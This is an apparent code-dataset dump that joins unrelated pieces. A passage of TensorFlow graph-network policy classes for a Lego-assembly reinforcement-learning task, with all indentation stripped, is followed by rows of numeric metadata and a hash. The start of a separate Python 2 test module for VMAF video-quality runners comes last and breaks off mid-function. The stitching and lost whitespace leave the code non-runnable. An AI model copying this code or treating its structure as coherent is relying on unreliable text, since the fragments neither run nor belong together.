for i in range(len(self.gcn_block)):
pivot_node_feature, pivot_edge_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, pivot_edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
result = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return result
class Lego_FC(tf.keras.Model):
def __init__(self, policy_network=None, hidden_dim=64, node_dim = 4, target_info_dim=4, edge_dim=4, layer_num=0):
super(Lego_FC, self).__init__()
# self.feature_fc = fc_relu(hidden_dim + target_info_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.feature_fc = fc_relu(hidden_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
def call(self, node_feature, adjacency, target_information, edge_feature, node_mask, training=True):
# tiled_target_information = tf.tile(tf.expand_dims(target_information, axis=1), (1, node_feature.shape[1], 1))
#
# ending_feature = self.feature_fc(tf.concat([node_feature, tiled_target_information], axis=-1))
ending_feature = self.feature_fc(node_feature)
return ending_feature
class PolicyWithValue_Lego_Artificial_NoGNN(tf.Module):
"""
Encapsulates fields and methods for RL policy and value function estimation with shared parameters
"""
def __init__(self, ac_space, policy_network, target_network, hidden_dim, target_hidden_dim, value_network=None, estimate_q=False):
"""
Parameters:
----------
ac_space action space
policy_network keras network for policy
value_network keras network for value
estimate_q q value or v value
"""
self.estimate_q = estimate_q
self.initial_state = None
self.target_network = target_network
# hidden_dim = 64
reshaped_hidden_dim = hidden_dim * 3
target_init_dim = 3
# target_hidden_dim = 64 * 3
reshaped_target_hidden_dim = target_hidden_dim * 3
edge_init_dim = 4
self.init_node_fc = Init_FC(layer_type=0, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
self.gcn_init = Lego_FC(policy_network, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.gcn_block = []
for i in range(2):
temp_gcn = Lego_FC(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.gcn_block.append(temp_gcn)
self.pivot_gcn_init = Lego_FC(policy_network=None, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.pivot_gcn_block = []
for i in range(2):
temp_gcn = Lego_FC(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.pivot_gcn_block.append(temp_gcn)
self.pivot_classifier = fc(reshaped_hidden_dim + reshaped_target_hidden_dim, 'piv', 1, init_scale=np.sqrt(2))
# Based on the action space, will select what probability distribution type
self.pdtype = make_pdtype((None, reshaped_hidden_dim + reshaped_target_hidden_dim), ac_space, init_scale=np.sqrt(2))
if estimate_q:
assert isinstance(ac_space, gym.spaces.Discrete)
self.value_fc = fc(hidden_dim, 'q', ac_space.n, init_scale=np.sqrt(2))
else:
self.value_fc = fc(reshaped_hidden_dim + reshaped_hidden_dim + reshaped_target_hidden_dim, 'vf', 1, init_scale=np.sqrt(2))
@tf.function
def step(self, observation, pivot_mask, offset_mask, training=True):
"""
Compute next action(s) given the observation(s)
Parameters:
----------
observation batched observation data
Returns:
-------
(action, value estimate, next state, negative log likelihood of the action under current policy parameters) tuple
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
action_node_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
pivot_node_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
for_pivot_node_logits = tf.squeeze(self.pivot_classifier(tf.concat([pivot_node_feature, tiled_target_information], axis=-1)), axis=2)
squeezed_node_mask = tf.squeeze(node_mask, axis=-1)
squeezed_pivot_mask = tf.cast(tf.math.multiply(tf.squeeze(pivot_mask, axis=-1), squeezed_node_mask), tf.float32)
negative_node_mask = tf.cast((tf.ones_like(squeezed_node_mask) - squeezed_node_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
negative_pivot_mask = tf.cast((tf.ones_like(squeezed_pivot_mask) - squeezed_pivot_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
masked_for_pivot_node_logits = for_pivot_node_logits + negative_pivot_mask
pivot_node_index = tf.random.categorical(masked_for_pivot_node_logits, 1)
pivot_cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
pivot_probs = tf.nn.softmax(masked_for_pivot_node_logits, axis=-1)
pivot_neglogp = pivot_cce(y_true=tf.one_hot(pivot_node_index, for_pivot_node_logits.shape[-1]), y_pred=pivot_probs)
node_latent_representation = []
for i in range(node_feature.shape[0]):
node_latent_representation.append(action_node_feature[i][tf.squeeze(pivot_node_index)[i]])
'''Shape : (num_envs, hidden_dim)'''
node_latent_representation = tf.stack(node_latent_representation)
per_pivot_available_actions = []
for i in range(node_feature.shape[0]):
per_pivot_available_actions.append(offset_mask[i][tf.squeeze(pivot_node_index)[i]])
per_pivot_available_actions = tf.stack(per_pivot_available_actions)
# pd, pi = self.pdtype.pdfromlatent(self.pdtype_pre_fc(tf.concat([node_latent_representation, target_information], axis=-1)))
pd, pi = self.pdtype.pdfromlatent(tf.concat([node_latent_representation, reshaped_target_information], axis=-1))
negative_logits_mask = (tf.ones_like(per_pivot_available_actions) - per_pivot_available_actions) * int(-1e8)
masked_action_logits = pi + tf.cast(negative_logits_mask, pi.dtype)
action = tf.random.categorical(masked_action_logits, 1)
cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
probs = tf.nn.softmax(masked_action_logits, axis=-1)
neglogp = cce(y_true=tf.one_hot(action, pi.shape[-1]), y_pred=probs)
# vf = tf.squeeze(self.value_fc(self.value_pre_fc(tf.concat([global_graph_feature, target_information], axis=-1))), axis=1)
vf = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
# return tf.cast(action, dtype=tf.int32), vf, None, neglogp, tf.cast(pivot_node_index, dtype=tf.int32)
return tf.cast(action, dtype=tf.int32), vf, None, neglogp, pivot_neglogp, tf.cast(pivot_node_index, dtype=tf.int32)
@tf.function
def value(self, observation):
"""
Compute value estimate(s) given the observation(s)
Parameters:
----------
observation observation data (either single or a batch)
Returns:
-------
value estimate
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
action_node_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
pivot_node_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
result = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return result
class Lego_Message_Passing_No_Edge(tf.keras.Model):
def __init__(self, policy_network=None, hidden_dim=64, node_dim = 4, target_info_dim=4, edge_dim=4, layer_num=0):
super(Lego_Message_Passing_No_Edge, self).__init__()
# self.feature_fc = fc_relu(node_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.feature_fc = fc(node_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.relu = tf.keras.layers.ReLU()
def call(self, node_feature, adjacency, target_information, edge_feature, node_mask, training=True):
# normalized_adjacency = tf.math.divide(adjacency, tf.reduce_sum(adjacency, axis=(1,2), keepdims=True))
# ending_feature = tf.linalg.matmul(normalized_adjacency, self.feature_fc(node_feature))
# ending_feature = self.relu(tf.linalg.matmul(normalized_adjacency, self.feature_fc(node_feature)))
# ending_feature = tf.linalg.matmul(adjacency, self.feature_fc(node_feature))
ending_feature = self.relu(tf.linalg.matmul(adjacency, self.feature_fc(node_feature)))
edge_feature = edge_feature
return ending_feature, edge_feature
class PolicyWithValue_Lego_Artificial_NoEdgeGNN(tf.Module):
"""
Encapsulates fields and methods for RL policy and value function estimation with shared parameters
"""
def __init__(self, ac_space, policy_network, target_network, hidden_dim, target_hidden_dim, value_network=None, estimate_q=False):
"""
Parameters:
----------
ac_space action space
policy_network keras network for policy
value_network keras network for value
estimate_q q value or v value
"""
self.estimate_q = estimate_q
self.initial_state = None
self.target_network = target_network
# hidden_dim = 64
reshaped_hidden_dim = hidden_dim * 3
target_init_dim = 3
# target_hidden_dim = 64 * 3
reshaped_target_hidden_dim = target_hidden_dim * 3
edge_init_dim = 4
self.init_node_fc = Init_FC(layer_type=0, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
self.gcn_init = Lego_Message_Passing_No_Edge(policy_network, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.gcn_block = []
for i in range(2):
temp_gcn = Lego_Message_Passing_No_Edge(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.gcn_block.append(temp_gcn)
self.pivot_gcn_init = Lego_Message_Passing_No_Edge(policy_network=None, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.pivot_gcn_block = []
for i in range(2):
temp_gcn = Lego_Message_Passing_No_Edge(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.pivot_gcn_block.append(temp_gcn)
self.pivot_classifier = fc(reshaped_hidden_dim + reshaped_target_hidden_dim, 'piv', 1, init_scale=np.sqrt(2))
# Based on the action space, will select what probability distribution type
self.pdtype = make_pdtype((None, reshaped_hidden_dim + reshaped_target_hidden_dim), ac_space, init_scale=np.sqrt(2))
if estimate_q:
assert isinstance(ac_space, gym.spaces.Discrete)
self.value_fc = fc(hidden_dim, 'q', ac_space.n, init_scale=np.sqrt(2))
else:
self.value_fc = fc(reshaped_hidden_dim + reshaped_hidden_dim + reshaped_target_hidden_dim, 'vf', 1, init_scale=np.sqrt(2))
@tf.function
def step(self, observation, pivot_mask, offset_mask, training=True):
"""
Compute next action(s) given the observation(s)
Parameters:
----------
observation batched observation data
Returns:
-------
(action, value estimate, next state, negative log likelihood of the action under current policy parameters) tuple
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
action_node_feature, edge_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature, edge_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
pivot_node_feature, edge_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature, edge_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# action_graph_feature = tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1)
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# pivot_graph_feature = tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1)
for_pivot_node_logits = tf.squeeze(self.pivot_classifier(tf.concat([pivot_node_feature, tiled_target_information], axis=-1)), axis=2)
squeezed_node_mask = tf.squeeze(node_mask, axis=-1)
squeezed_pivot_mask = tf.cast(tf.math.multiply(tf.squeeze(pivot_mask, axis=-1), squeezed_node_mask), tf.float32)
negative_node_mask = tf.cast((tf.ones_like(squeezed_node_mask) - squeezed_node_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
negative_pivot_mask = tf.cast((tf.ones_like(squeezed_pivot_mask) - squeezed_pivot_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
masked_for_pivot_node_logits = for_pivot_node_logits + negative_pivot_mask
pivot_node_index = tf.random.categorical(masked_for_pivot_node_logits, 1)
pivot_cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
pivot_probs = tf.nn.softmax(masked_for_pivot_node_logits, axis=-1)
pivot_neglogp = pivot_cce(y_true=tf.one_hot(pivot_node_index, for_pivot_node_logits.shape[-1]), y_pred=pivot_probs)
node_latent_representation = []
for i in range(node_feature.shape[0]):
node_latent_representation.append(action_node_feature[i][tf.squeeze(pivot_node_index)[i]])
'''Shape : (num_envs, hidden_dim)'''
node_latent_representation = tf.stack(node_latent_representation)
per_pivot_available_actions = []
for i in range(node_feature.shape[0]):
per_pivot_available_actions.append(offset_mask[i][tf.squeeze(pivot_node_index)[i]])
per_pivot_available_actions = tf.stack(per_pivot_available_actions)
pd, pi = self.pdtype.pdfromlatent(tf.concat([node_latent_representation, reshaped_target_information], axis=-1))
negative_logits_mask = (tf.ones_like(per_pivot_available_actions) - per_pivot_available_actions) * int(-1e8)
masked_action_logits = pi + tf.cast(negative_logits_mask, pi.dtype)
action = tf.random.categorical(masked_action_logits, 1)
cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
probs = tf.nn.softmax(masked_action_logits, axis=-1)
neglogp = cce(y_true=tf.one_hot(action, pi.shape[-1]), y_pred=probs)
vf = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return tf.cast(action, dtype=tf.int32), vf, None, neglogp, pivot_neglogp, tf.cast(pivot_node_index, dtype=tf.int32)
@tf.function
def value(self, observation):
"""
Compute value estimate(s) given the observation(s)
Parameters:
----------
observation observation data (either single or a batch)
Returns:
-------
value estimate
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
action_node_feature, edge_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature, edge_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
pivot_node_feature, edge_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature, edge_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
result = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return result
| 51.14715
| 240
| 0.715684
| 6,753
| 49,357
| 4.853695
| 0.031542
| 0.108918
| 0.057967
| 0.031119
| 0.981633
| 0.973518
| 0.970833
| 0.968026
| 0.964548
| 0.95265
| 0
| 0.011372
| 0.180481
| 49,357
| 964
| 241
| 51.200207
| 0.798957
| 0.148834
| 0
| 0.859091
| 0
| 0
| 0.019957
| 0
| 0
| 0
| 0
| 0
| 0.009091
| 1
| 0.054545
| false
| 0.036364
| 0.011364
| 0
| 0.120455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ad9aff4ea8fa988a8e9703dad7e58d85dd2bd44
| 96,028
|
py
|
Python
|
python/test/quality_runner_test.py
|
match/vmaf
|
96dd464c08b2b5fd841498b25991c1d04acdb283
|
[
"Apache-2.0"
] | null | null | null |
python/test/quality_runner_test.py
|
match/vmaf
|
96dd464c08b2b5fd841498b25991c1d04acdb283
|
[
"Apache-2.0"
] | null | null | null |
python/test/quality_runner_test.py
|
match/vmaf
|
96dd464c08b2b5fd841498b25991c1d04acdb283
|
[
"Apache-2.0"
] | 1
|
2021-09-06T08:32:00.000Z
|
2021-09-06T08:32:00.000Z
|
from vmaf.tools.stats import ListStats
__copyright__ = "Copyright 2016-2018, Netflix, Inc."
__license__ = "Apache, Version 2.0"
import os
import unittest
from vmaf.config import VmafConfig
from vmaf.core.asset import Asset, NorefAsset
from vmaf.core.quality_runner import VmafLegacyQualityRunner, VmafQualityRunner, \
PsnrQualityRunner, VmafossExecQualityRunner, MsSsimQualityRunner, \
SsimQualityRunner, Adm2QualityRunner, VmafPhoneQualityRunner, VifQualityRunner, \
Vif2QualityRunner, BootstrapVmafQualityRunner, BaggingVmafQualityRunner, NiqeQualityRunner, \
EnsembleVmafQualityRunner
from vmaf.core.result_store import FileSystemResultStore
from testutil import set_default_576_324_videos_for_testing, set_default_flat_1920_1080_videos_for_testing
class QualityRunnerTest(unittest.TestCase):
def tearDown(self):
if hasattr(self, 'runner'):
self.runner.remove_results()
pass
def setUp(self):
self.result_store = FileSystemResultStore()
def test_executor_id(self):
asset = Asset(dataset="test", content_id=0, asset_id=1,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width': 720, 'height': 480})
runner = VmafLegacyQualityRunner([asset], None)
self.assertEquals(runner.executor_id, 'VMAF_legacy_VF0.2.4c-1.1')
def test_run_vmaf_legacy_runner(self):
print 'test on running VMAF (legacy) runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafLegacyQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'],0.4460930625000001, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.509571520833337, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.271439270833337, places=4)
self.assertAlmostEqual(results[0]['VMAF_legacy_score'], 65.393758021816708, places=4)
self.assertAlmostEqual(results[1]['VMAF_legacy_score'], 96.444658329804156, places=4)
def test_run_vmaf_legacy_runner_10le(self):
print 'test on running VMAF (legacy) runner on 10 bit le...'
ref_path = VmafConfig.test_resource_path("yuv", "src01_hrc00_576x324.yuv422p10le.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "src01_hrc01_576x324.yuv422p10le.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':576, 'height':324,
'yuv_type':'yuv422p10le'})
asset_original = Asset(dataset="test", content_id=0, asset_id=1,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=ref_path,
asset_dict={'width':576, 'height':324,
'yuv_type':'yuv422p10le'})
self.runner = VmafLegacyQualityRunner(
[asset, asset_original],
None, fifo_mode=False,
delete_workdir=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.44609306249999997, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.0498253541666669, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.509571520833333, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.0498253541666669, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.271439270833337, places=4)
self.assertAlmostEqual(results[0]['VMAF_legacy_score'], 65.393758021816708, places=4)
self.assertAlmostEqual(results[1]['VMAF_legacy_score'], 96.444658329804156, places=4)
def test_run_vmaf_legacy_runner_with_result_store(self):
print 'test on running VMAF (legacy) runner with result store...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
result_store = FileSystemResultStore(logger=None)
self.runner = VmafLegacyQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=result_store
)
print ' running for the first time with fresh calculation...'
self.runner.run()
result0, result1 = self.runner.results
# NOTE: since stored results are actually VMAF_feature's not VMAF's,
# the two paths below shouldn't exist
self.assertFalse(os.path.exists(result_store._get_result_file_path(result0)))
self.assertFalse(os.path.exists(result_store._get_result_file_path(result1)))
print ' running for the second time with stored results...'
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.44609306249999997, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.0498253541666669, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.509571520833333, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.0498253541666669, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.271439270833337, places=4)
self.assertAlmostEqual(results[0]['VMAF_legacy_score'], 65.393758021816708, places=4)
self.assertAlmostEqual(results[1]['VMAF_legacy_score'], 96.444658329804156, places=4)
def test_run_vmaf_runner_v1_model(self):
print 'test on running VMAF runner (v1 model)...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.model_path("nflx_v1.pkl"),
},
optional_dict2=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.44609306249999997, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.5095715208, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.2714392708, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 77.198367166977064, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 100.0, places=4)
def test_run_vmaf_runner(self):
print 'test on running VMAF runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.766647542135, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.862854666902, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.915971778036, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93458780728708746, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.00000001415, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'],0.99999972612, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999999465724, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 0.999999399683, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 99.946416604585025, places=4)
def test_run_vmaf_runner_with_phone_score(self):
print 'test on running VMAF runner with phone score...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'enable_transform_score': True,
}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_score'], 92.542390144364546, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 100.0, places=4)
def test_run_vmaf_phone_runner(self):
print 'test on running VMAF phone runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
